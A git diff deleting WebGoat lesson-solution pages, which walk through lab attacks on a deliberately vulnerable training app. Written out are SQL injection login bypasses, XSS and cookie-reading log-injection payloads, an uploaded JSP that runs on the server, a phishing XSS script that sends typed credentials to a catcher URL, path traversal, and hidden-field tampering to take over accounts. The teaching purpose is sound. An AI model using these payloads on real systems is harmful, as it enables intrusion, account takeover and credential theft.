-PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-
-
-Now that the query is prepared we have to add the parameters to the query:
-
-statement.setString(1, userId);
-statement.setString(2, password);
-
-
-
-We are ready to execute the query!
-
-ResultSet answer_results = statement.executeQuery();
-
-Putting everything together results in:
-
-String query = "SELECT * FROM employee WHERE userid = ? and password = ?";
-try
-{
- Connection connection = WebSession.getConnections(s);
- PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
- statement.setString(1, userId);
- statement.setString(2, password);
- ResultSet answer_results = statement.executeQuery();
- etc...
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab Parameterized Query #2.html b/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab Parameterized Query #2.html
deleted file mode 100644
index 8016c18a9..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab Parameterized Query #2.html
+++ /dev/null
@@ -1,51 +0,0 @@
-
-
-
-
-Solution Lab SQL Injection Stage4
-
-
-
-Lesson Plan Title: How to Perform a SQLInjection
-
-Concept / Topic To Teach:
-SQL injection attacks represent a serious threat to any database-driven
-site. The methods behind an attack are easy to learn and the damage
-caused can range from considerable to complete system compromise.
-Despite these risks, an incredible number of systems on the internet are
-susceptible to this form of attack.
-
-Not only is it a threat easily instigated, it is also a threat
-that, with a little common-sense and forethought, can easily be
-prevented.
-
-It is always good practice to sanitize all input data, especially
-data that will used in OS command, scripts, and database queiries, even
-if the threat of SQL injection has been prevented in some other manner.
-
-
-General Goal(s):
-For this exercise, you will perform SQLInjection attacks. You will also
-implement code changes in the web application to defeat these attacks.
-
-Solution:
-The solution is simular to Stage2. That is why here is only a short solution.
-You have to alter the class org.owasp.webgoat.lessons.SQLInjection.ViewProfile.java
-Alter the method getEmployeeProfile to something like this:
-
-String query = "SELECT employee.* "
- + "FROM employee,ownership WHERE employee.userid = ownership.employee_id and "
- + "ownership.employer_id = ? and ownership.employee_id = ?";
-try
-{
- Connection connection = WebSession.getConnections(s);
- PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
- statement.setString(1, userId);
- statement.setString(2, subjectUserId);
- ResultSet answer_results = statement.executeQuery();
- etc...
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab String SQL Injection.html b/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab String SQL Injection.html
deleted file mode 100644
index ce1d354a7..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab String SQL Injection.html
+++ /dev/null
@@ -1,39 +0,0 @@
-
-
-
-
-Solution Lab SQL Injection Stage1
-
-
-
-Lesson Plan Title: How to Perform a SQLInjection
-
-Concept / Topic To Teach:
-SQL injection attacks represent a serious threat to any database-driven
-site. The methods behind an attack are easy to learn and the damage
-caused can range from considerable to complete system compromise.
-Despite these risks, an incredible number of systems on the internet are
-susceptible to this form of attack.
-
-Not only is it a threat easily instigated, it is also a threat
-that, with a little common-sense and forethought, can easily be
-prevented.
-
-It is always good practice to sanitize all input data, especially
-data that will used in OS command, scripts, and database queiries, even
-if the threat of SQL injection has been prevented in some other manner.
-
-
-General Goal(s):
-For this exercise, you will perform SQLInjection attacks. You will also
-implement code changes in the web application to defeat these attacks.
-
-Solution:
-Select Neville as user to log in. Make sure WebScarab will intercept the next request.
-Hit the Login Button and Change the password parameter in WebScarab to smith' OR '1' = '1.
-Et voila you are logged in as Neville without knowing the password as the query
-will lookup if the password is smith and if not it controls if 1=1 what
-return true.
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Block Reflected XSS.html b/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Block Reflected XSS.html
deleted file mode 100644
index 28a31d1eb..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Block Reflected XSS.html
+++ /dev/null
@@ -1,32 +0,0 @@
-
-
-
-
-Solution Lab Block Stored XSS
-
-
-
-Lesson Plan Title: How to Perform Cross Site Scripting (XSS)
-
-Concept / Topic To Teach:
-It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved.
-XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it.
-
-
-General Goal(s):
-For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks.
-
-
-Solution:
-The Solution is rather simular to stage 2. You have to edit org.owasp.webgoat.lessons.CrossSiteScripting.FindProfile.java.
-Alter the method getRequestParameter. The body of the mehtod should look something like this:
-String regex = "[\\s\\w-,]*";
-String parameter = s.getParser().getRawParameter(name);
-Pattern pattern = Pattern.compile(regex);
-validate(parameter, pattern);
-
-return parameter;
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Block Stored XSS using Input Validation.html b/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Block Stored XSS using Input Validation.html
deleted file mode 100644
index fd834d3c0..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Block Stored XSS using Input Validation.html
+++ /dev/null
@@ -1,46 +0,0 @@
-
-
-
-
-Solution Lab Block Stored XSS
-
-
-
-Lesson Plan Title: How to Perform Cross Site Scripting (XSS)
-
-Concept / Topic To Teach:
-It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved.
-XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it.
-
-
-General Goal(s):
-For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks.
-
-
-Solution:
-You have to alter the method parseEmployeeProfile in the class UpdateProfile.java which is
-placed in the package org.owasp.webgoat.lessons.CrossSiteScripting
-The place to code is marked! Following code will work:
-
-
-
-/**Your code**/
-String regex = "[\\s\\w-,]*";
-String stringToValidate = firstName+lastName+ssn+title+phone+address1+address2+ startDate+ccn+disciplinaryActionDate+ disciplinaryActionNotes+personalDescription;
-Pattern pattern = Pattern.compile(regex);
-validate(stringToValidate, pattern);
-/**End of your code**/
-
-
-
-This validation allows following:
-\s = whitspace: \t\n\x0B\f\r
-\w = word: a-zA-Z_0-9
-and the characters - and ,
-
-
-Use of any other character will throw a Validation Exception.
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Block Stored XSS using Output Encoding.html b/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Block Stored XSS using Output Encoding.html
deleted file mode 100644
index 52a4b3283..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Block Stored XSS using Output Encoding.html
+++ /dev/null
@@ -1,26 +0,0 @@
-
-
-
-
-Solution Lab Block Stored XSS
-
-
-
-Lesson Plan Title: How to Perform Cross Site Scripting (XSS)
-
-Concept / Topic To Teach:
-It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved.
-XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it.
-
-
-General Goal(s):
-For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks.
-
-
-Solution:
-You have to use a static method called encode(String s) which is part of the class org.owasp.webgoat.util.HtmlEncoder.
-
This method changes all special characters in the string. Now you have to use this method in the getEmployeeProfile method in the org.owasp.webgoat.lessons.CrossSiteScripting.ViewProfile class.
-Replace all answer_results.getString(someString) with HtmlEncoder.encode(answer_results.getString(someString)) and you are done.
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Reflected XSS.html b/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Reflected XSS.html
deleted file mode 100644
index e53bc0e3c..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Reflected XSS.html
+++ /dev/null
@@ -1,27 +0,0 @@
-
-
-
-
-Solution Lab Block Stored XSS
-
-
-
-Lesson Plan Title: How to Perform Cross Site Scripting (XSS)
-
-Concept / Topic To Teach:
-It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved.
-XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it.
-
-
-General Goal(s):
-For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks.
-
-
-Solution:
-First log in as an user for example as Larry with password larry. Now click on
-the 'SearchStaff' Button. Burry a script in the field for example:
-<script>alert("Dangerous");</script>
. Now hit
-the 'FindProfile' Button and you are done.
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Stored XSS Revisited.html b/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Stored XSS Revisited.html
deleted file mode 100644
index 50f976cc4..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Stored XSS Revisited.html
+++ /dev/null
@@ -1,27 +0,0 @@
-
-
-
-
-Solution Lab Block Stored XSS
-
-
-
-Lesson Plan Title: How to Perform Cross Site Scripting (XSS)
-
-Concept / Topic To Teach:
-It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved.
-XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it.
-
-
-General Goal(s):
-For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks.
-
-
-Solution:
-Log in as David with david as password. Choose Bruce from the List and click
-on the 'ViewProfile' Button.
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Stored XSS.html b/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Stored XSS.html
deleted file mode 100644
index a57dc020a..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Stored XSS.html
+++ /dev/null
@@ -1,36 +0,0 @@
-
-
-
-
-Solution Lab Block Stored XSS
-
-
-
-Lesson Plan Title: How to Perform Cross Site Scripting (XSS)
-
-Concept / Topic To Teach:
-It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved.
-XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it.
-
-
-General Goal(s):
-For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks.
-
-
-Solution:
-First Login as Tom with tom as password. Select Tom from the list and click on the View Profile Button.
-Now should appear Tom's Profile. Click on the 'Edit Profile' Button and try an XSS attack on the street filed.
-For example: <script>alert("Got Ya");</script>
-Click on the UpdateProfile Button and Log out.
-
-
-
-
-
-Now log in as Jerry with jerry as password. Select from the the list the profile of tom and hit the
-ViewProfile Button. Congratulation! You have completed the lesson.
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab XSS/images/stored_xss.png b/src/main/webapp/lesson_solutions_1/Lab XSS/images/stored_xss.png
deleted file mode 100644
index 83aa7983e..000000000
Binary files a/src/main/webapp/lesson_solutions_1/Lab XSS/images/stored_xss.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/LogSpoofing.html b/src/main/webapp/lesson_solutions_1/LogSpoofing.html
deleted file mode 100644
index c1538709d..000000000
--- a/src/main/webapp/lesson_solutions_1/LogSpoofing.html
+++ /dev/null
@@ -1,793 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to
-Perform Log Spoofing.
-
-
-
-
Concept /
-Topic To Teach:
-
-
This lesson
-teaches attempts to fool the human eye.
-
-
-
-
How the
-attacks works: The attack
-is based on fooling the human eye in log files. An attacker can erase his
-traces from the logs using this attack.
-
-
-
-
General
-Goal(s):
-
-
The
-grey area below represents what is going to be logged in the web server's log
-file.
-Your goal is to make it like a username "admin" has succeeded into
-logging in.
-Elevate your attack by adding a script to the log file.
-
-
-
-
-
-
Figure 1 Log Spoofing
-
-
-
-
Solution:
-
-
-
-
This lesson accepts any input for a username and appends the information
-to the log file.
-
-
-
-
Enter for username the text: smith Login Succeeded for username admin
-
-
-
-
-
-
Figure 2 Log spoof with long text
-
-
-
-
The text is added to the same line, not a new line. But any input is
-allowed.
-
-
In this way you can inject carriage return (%0d) and line feed (%0a) to
-the application.
-
-
-
-
Fill out the following text for the username: Smith%0d%0aLogin Succeeded
-for username: admin
-
-
-
-
-
-
Figure 3 Lesson completed
-
-
-
-
An attacker
-can use this attack to add malicious JavaScript to the log file, which will be
-viewed by the administrator using a browser. What happens when you inject admin
-<script>alert(document.cookie)</script> for the username?
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/MaliciousFileExecution.html b/src/main/webapp/lesson_solutions_1/MaliciousFileExecution.html
deleted file mode 100644
index 0a4e0b348..000000000
--- a/src/main/webapp/lesson_solutions_1/MaliciousFileExecution.html
+++ /dev/null
@@ -1,46 +0,0 @@
-
-
-
-
-Solution: Malicious File Execution
-
-
-
-Lesson Plan Title: Malicious File Execution
-
-Concept / Topic To Teach:
-Many sites allow the user to upload files, such as images or videos. Without the proper security, files containing malicious commands can be and then executed on the server.
-
-
-General Goal(s):
-The form below allows you to upload an image which will be displayed on this page. Features like this are often found on web based discussion boards and social networking sites. This feature is vulnerable to Malicious File Execution.
-
-In order to pass this lession, upload and run a malicious file. In order to prove that your file can execute, it should create another file named guest.txt
-
-Once you have created this file, you will pass the lesson.
-
-
-Solution:
-The first step of malicious file execution is to create a file that we can run on the server. In this lesson, our goal is to create the file guest.txt in the directory provided in the lesson (the path is generated based on your system).
-To do this, we write a .jsp file that uses the java createNewFile() command. The file contents will look like this:
-
-<HTML>
-<%
-java.io.File file = new java.io.File("filepath \\guest.txt");
-file.createNewFile();
-%>
-</HTML>
-The <% indicates that the upcoming code is a java servlet, so java code is allowed. Make sure you fill in the filepath correctly - each directory must be separated by \\ , not \ . The filename of the .jsp doesn't matter, as long as you know what it is.
-Next, we need to figure out where the files are being uploaded so we can execute them. In this case, since we are shown the image, this is very easy. Upload an image using the form, then right click on it and check its properties.
-
-Viewing properties of the uploaded image in Firefox.
-
-File path for the uploaded image (and our .jsp) in Firefox.
-The URL should look something like http://localhost/WebGoat/uploads/image.jpg .
-The last step is to upload our malicious .jsp and browse to it so it will execute. Upload the file, then type its address into your browser. The address should be something like http://localhost/WebGoat/uploads/yourfile.jsp .
-A blank page will load. You can then return to the lesson and refresh, completing the lesson.
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/MultiLevelLogin1.html b/src/main/webapp/lesson_solutions_1/MultiLevelLogin1.html
deleted file mode 100644
index d45f1508b..000000000
--- a/src/main/webapp/lesson_solutions_1/MultiLevelLogin1.html
+++ /dev/null
@@ -1,71 +0,0 @@
-
-
-
-
-Multi Level Login 1
-
-
-
-Lesson Plan Title: Multi Level Login 1
-
-Concept / Topic To Teach:
-A Multi Level Login should provide a strong authentication.
-This is archived by adding a second layer. After having logged
-in with your user name and password you are asked for a
-'Transaction Authentication Number' (TAN). This is often used by
-online banking. You get a list with a lots of TANs generated only
-for you by the bank. Each TAN is used only once. Another method is
-to provide the TAN by SMS. This has the advantage that an attacker
- can not get TANs provided by the user.
-
-
-General Goal(s):
-In this Lesson you try to get around the strong authentication.
-You have to break into another account. The user name, password
-and a already used TAN is provided. You have to make sure the server
-accept the TAN even it is already used.
-
-
-Solution:
-This Lesson has two stages. The first stage is only to show how a multi level login
-works. In the second you have to break the strong authentication.
-
-Stage 1
-This stage should be rather straight forward. Give in as name Jane
-and as password tarzan.
-
-
-Figure 1: Login Screen
-
-Afthr clicking on the submit button
-you will be asked for the TAN.
-
-
-Figure 2: TAN Screen
-
-
-Choose the correct TAN from the
-list provided, click on the submit button and you are done.
-
-
-Stage 2
-The first step in this stage is equal to Stage 1. Log in as Jane with tarzan as password.
-Now you will be asked for a TAN. Unfortunately you have only a already
-used TAN from the victim. Fill in the TAN you have and make sure that WebScarab
-will intercept the next request. Hit the submit button and change the hidden_tan
-value to 1.
-
-
-Figure 3: Manipulation Of The Hidden Field With WebScarab
-
-Congratulations you are logged in as Jane.
-
-
-
-Figure 4: Manipulation Of The Hidden Field With WebScarab
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/MultiLevelLogin2.html b/src/main/webapp/lesson_solutions_1/MultiLevelLogin2.html
deleted file mode 100644
index bb63045b9..000000000
--- a/src/main/webapp/lesson_solutions_1/MultiLevelLogin2.html
+++ /dev/null
@@ -1,43 +0,0 @@
-
-
-
-
-Multi Level Login 2
-
-
-
-Lesson Plan Title: Multi Level Login 2
-
-Concept / Topic To Teach:
-A Multi Level Login should provide a strong authentication.
-This is archived by adding a second layer. After having logged
-in with your user name and password you are asked for a
-'Transaction Authentication Number' (TAN). This is often used by
-online banking. You get a list with a lots of TANs generated only
-for you by the bank. Each TAN is used only once. Another method is
-to provide the TAN by SMS. This has the advantage that an attacker
- can not get TANs provided by the user.
-
-
-General Goal(s):
-In this lesson you have to try to break into another account.
-You have an own account for WebGoat Financial but you want to log into
-another account only knowing the user name of the victim to attack.
-
-
-Solution:
-The solution for this lesson is similar to the solution from
-multi level login 1 stage 2 but the approach is a little different.
-This time you have only the user name of your victim but an own account
-on WebGoat Financial.
-Log in as Joe with password banana. Now make sure the next request will be intercepted
-by WebScarab. Fill in the TAN you are asked for and hit the submit button.
-Change now the hidden_user value from Joe to Jane and you are logged in
-as Jane.
-
-
-
Figure 1: Manipulation Of The Hidden Field With WebScarab
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/OffByOne.html b/src/main/webapp/lesson_solutions_1/OffByOne.html
deleted file mode 100644
index 0447a1fbc..000000000
--- a/src/main/webapp/lesson_solutions_1/OffByOne.html
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
-
-
-Solution: Modify Data with SQL
-
-
-
-Lesson Plan Title: Off By One Buffer Overflows
-
-This new lesson does not yet have a detailed solution. If you would like to provide a solution for this lesson, please send an e-mail to WebGoat@owasp.org .
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/PasswordStrength.html b/src/main/webapp/lesson_solutions_1/PasswordStrength.html
deleted file mode 100644
index 39f816477..000000000
--- a/src/main/webapp/lesson_solutions_1/PasswordStrength.html
+++ /dev/null
@@ -1,37 +0,0 @@
-
-
-
-
-password Strength
-
-
-
-Lesson Plan Title: Password Strength
-
-Concept / Topic To Teach:
-
-Accounts are only as secure as there passwords. Most users have the same weak password everywhere. If you want to protect them against brute-force-attacks your application should have good requirements for passwords. The password should contain lower case letters, capitals and numbers. The longer the password, the better.
-
-
-General Goal(s):
- For this exercise, your job is to test several passwords on https://howsecureismypassword.net/ .
-
-Solution:
-Open your browser on https://howsecureismypassword.net/ . Copy the first password in the field and the page will automatically be updated.
-
-Password checker
-You will get get the result of the check.
-
-The result
-Do this with all of the six given passwords.
-Here are the results you get:
-
-Password = 123456: 0 seconds
-Password = abzfezd: 2 seconds
-Password = a9z1ezd: 19 seconds
-Password = aB8fEzDq: 15 hours
-Password = z8!E?7: 20 days
-Password = My1stPassword!:Redd: 364 quintillion years
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/PathBasedAccessControl.html b/src/main/webapp/lesson_solutions_1/PathBasedAccessControl.html
deleted file mode 100644
index 80c9bdb5a..000000000
--- a/src/main/webapp/lesson_solutions_1/PathBasedAccessControl.html
+++ /dev/null
@@ -1,650 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson Plan Title: How to Bypass a Path Based Access
-Control Scheme
-
-
Concept / Topic To Teach:
-
-In a path based access control scheme,
-an attacker can traverse a path by providing relative path information.
-Therefore an attacker can use relative paths to access files that normally are
-not directly accessible by anyone, or would otherwise be denied if requested
-directly.
-
-
General Goal(s):
-
-The user should be able to
-access a file that is not in the listed directory.
-
-
-
-
Figure 1 Lesson 8
-
-
-
-
Solution:
-
-
-
-
This lesson
-can be solved by intercepting the filename in WebScarab and replacing it with
-../main.jsp which is a file located in a folder below the current directory.
-
-
-
-
-
-
Figure 2 Change the variable File
-
-
-
-
-
-
Figure 3 Lessen 8 Completed
-
-
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/Phishing.html b/src/main/webapp/lesson_solutions_1/Phishing.html
deleted file mode 100644
index ac817a401..000000000
--- a/src/main/webapp/lesson_solutions_1/Phishing.html
+++ /dev/null
@@ -1,69 +0,0 @@
-
-
-
-Phising with XSS
-
-
-
-Lesson Plan Title: Phishing with XSS
-
-Concept / Topic To Teach:
-It is always a good practice to validate all input on the
-server side. XSS can occur when unvalidated user input is used
-in an HTTP response. With the help of XSS you can do a Phishing
-Attack and add content to a page which looks official. It is very
-hard for a victim to determinate that the content is malicious.
-
-
-General Goal(s):
-The user should be able to add a form asking for username
-and password. On submit the input should be sent to
-http://localhost/WebGoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName
-
-
-Solution:
-With XSS it is possible to add further elements to an existing Page.
-This solution consists of two parts you have to combine:
-
-A form the victim has to fill in
-A script which reads the form and sends the gathered information to the attacker
-
-A Form with username and password could look like this:
-
-</form><form name="phish"><br><br><HR><H3>This feature requires account login:</H3
-><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password"
-name = "pass"><br></form><br><br><HR>
- Search for this term and you will see that a form is added to the page since the search field accepts HTML.
- The initial </form> tag is to terminate the original search form.
-
-Now you need a script:
-
-<script>function hack(){ XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/ catcher?PROPERTY=yes&user="+
-document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen.
-User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);}
-</script>
-
-
-This script will read the input from the form and send it to the catcher of WebGoat.
-The text in blue should match what is in your address bar. If you are using ports and/or webscarab, it may be different.
-The last step is to put things together. Add a Button to the form which
-calls the script. You can reach this with the onclick="myFunction()" handler:
-
-
-<input type="submit" name="login" value="login" onclick="hack()">
-
-The final String looks like this:
-</form><script>function hack(){ XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/ catcher?PROPERTY=yes&user="+
-document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen.
-User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);}
-</script><form name="phish"><br><br><HR><H3>This feature requires account login:</H3
-><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password"
-name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>
-
-Search for this String and you will see a form asking for your username and password.
-Fill in these fields and click on the Login Button, which completes the lesson.
-
-New login field after submitting the script.
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/ReflectedXSS.html b/src/main/webapp/lesson_solutions_1/ReflectedXSS.html
deleted file mode 100644
index 7ae3f6a66..000000000
--- a/src/main/webapp/lesson_solutions_1/ReflectedXSS.html
+++ /dev/null
@@ -1,685 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson Plan Title: How to Perform Reflected Cross Site
-Scripting (XSS) Attacks
-
-
Concept / Topic To Teach:
-It is always a good practice to validate
-all input on the server side. XSS can occur when unvalidated user input is used
-in an HTTP response. In a reflected XSS attack, an attacker can craft a URL
-with the attack script and post it to another website, email it, or otherwise
-get a victim to click on it.
-
-
General Goal(s):
-For this exercise, your
-mission is to come up with some input containing a script. You have to try to
-get this page to reflect that input back to your browser, which will execute
-the script and do something bad.
-
-
-
-
Figure 1 Lesson 15
-
-
-
-
Solution:
-
-
-
-
Enter
-<script>alert('Bang!')</script> for the PIN value
-
-
-
-
-
-
Figure 2 Lesson 15 Completed
-
-
-
-
-
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/RemoteAdminFlaw.html b/src/main/webapp/lesson_solutions_1/RemoteAdminFlaw.html
deleted file mode 100644
index b154b0c40..000000000
--- a/src/main/webapp/lesson_solutions_1/RemoteAdminFlaw.html
+++ /dev/null
@@ -1,666 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: Remote
-Admin Access
-
-
-
-
Concept /
-Topic To Teach:
-
-
Applications
-will often have an administrative interface that allows privileged users access
-to functionality that normal users shouldn't see. The application server will
-often have an admin interface as well.
-
-
-
-
General
-Goal(s):
-
-
Try to access
-the administrative interface for WebGoat. You may also try to access the
-administrative interface for Tomcat. The Tomcat admin interface can be accessed
-via a URL (/admin) and will not count towards the completion of this lesson.
-
-
-
-
-
-
Figure 1 Lesson 7
-
-
-
-
Solution:
-
-
-
-
Append &admin=true to the URL in the
-browser and hit "Enter"
-
-
-
-
Open the menu
-"Admin functions" and notice that you have additional menu options like
-"Database Dump", "User Information" and "Product Information".
-
-
-
-
-
-
Figure 2 Some extra admin functions
-
-
-
-
Clicking on
-"User Information" will not work. This is because the URL behind "User
-Information" is http://localhostattack?Screen=71&menu=10
-does not contain the parameter admin=true. Rewrite the URL to become http://localhostattack?Screen=71&menu=10&admin=true
-
-
-
-
Remark: the parameter Screen is generated
-randomly and can be different in your environment!
-
-
-
-
-
-
Figure 3 Lesson 7 Completed
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/SameOriginPolicyProtection.html b/src/main/webapp/lesson_solutions_1/SameOriginPolicyProtection.html
deleted file mode 100644
index 59fac9fa5..000000000
--- a/src/main/webapp/lesson_solutions_1/SameOriginPolicyProtection.html
+++ /dev/null
@@ -1,641 +0,0 @@
-
-
-
-
-
-
-
-Solution: Same Origin Policy Protection
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: Same Origin Policy Protection.
-
-
-
-
Concept /
-Topic To Teach:
-
-
A key element of AJAX is the XMLHttpRequest (XHR), which allows javascript to make asynchronous calls from the client side to a server. However, as a security measure these requests may only be made to the server from which the client page originated.
-
-
-
-
General
-Goal(s):
-
-
-
-
This exercise demonstrates the Same Origin Policy Protection. XHR requests can only be passed back to the originating server. Attempts to pass data to a non-originating server will fail.
-
-
-
-
-
Solution:
-
-
Click both of the links on the page to see their behavior and complete the lesson.
-
-
-
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/SessionFixation.html b/src/main/webapp/lesson_solutions_1/SessionFixation.html
deleted file mode 100644
index 96310ab6e..000000000
--- a/src/main/webapp/lesson_solutions_1/SessionFixation.html
+++ /dev/null
@@ -1,121 +0,0 @@
-
-
-
-
-Session Fixation
-
-
-
-Lesson Plan Title: Session Fixation
-
-Concept / Topic To Teach:
-How to steal a session with a 'Session Fixation'
-
-
-How the attacks works:
-A user is recognized by the server by an unique
-Session ID. If a user has logged in and is authorized
-he does not have to reauthorize when he revisits the
-application as the user is recognized by the Session ID.
- In some applications it is possible to deliver the Session
- ID in the Get-Request. Here is where the attack starts.
-
-An attacker can send a hyperlink to a
- victim with a chosen Session ID. This can be
- done for example by a prepared mail which looks like an
-official mail from the application administrator. If the victim
- clicks on the link and logs in he is authorized by the
- Session ID the attacker has chosen. The attacker can visit
- the page with the same ID and is recognized as the victim
- and gets logged in without authorization.
-
-General Goal(s):
-This lesson has several stages. You play the attacker but
-also the victim. After having done this lesson it should be
- understood how a Session Fixation in general works. It should
- be also understood that it is a bad idea to use the Get-Request
- for Session IDs.
-
-
-
-
-Solution:
-This lesson has 4 stages. In stage 1 and 4 you are Hacker Joe
-in lesson 2 and 3 you are the victim Jane.
-
-
-Stage 1:
-You have to send a prepared mail to Jane which looks like a mail from Goat Hills Financial with a link containing a Session ID.
-The mail is already prepared. You only have to alter the link so it includes
-a Session ID (SID). You can archive this by adding &SID=WHATEVER to
-the link. Of course can WHATEVER be replaced by any other string.
-The link should look similar to following:
-<a href=http://localhostattack?Screen=46&menu=320&SID=WHATEVER>
-
-
-
-Figure 1: Prepared Mail
-
-
-
-
-Stage 2:
-Now you are Jane which receives the mail you wrote in stage 1.
-Point with the mouse on the link and you will notice the
-SID in the status bar of your browser. This is the easiest
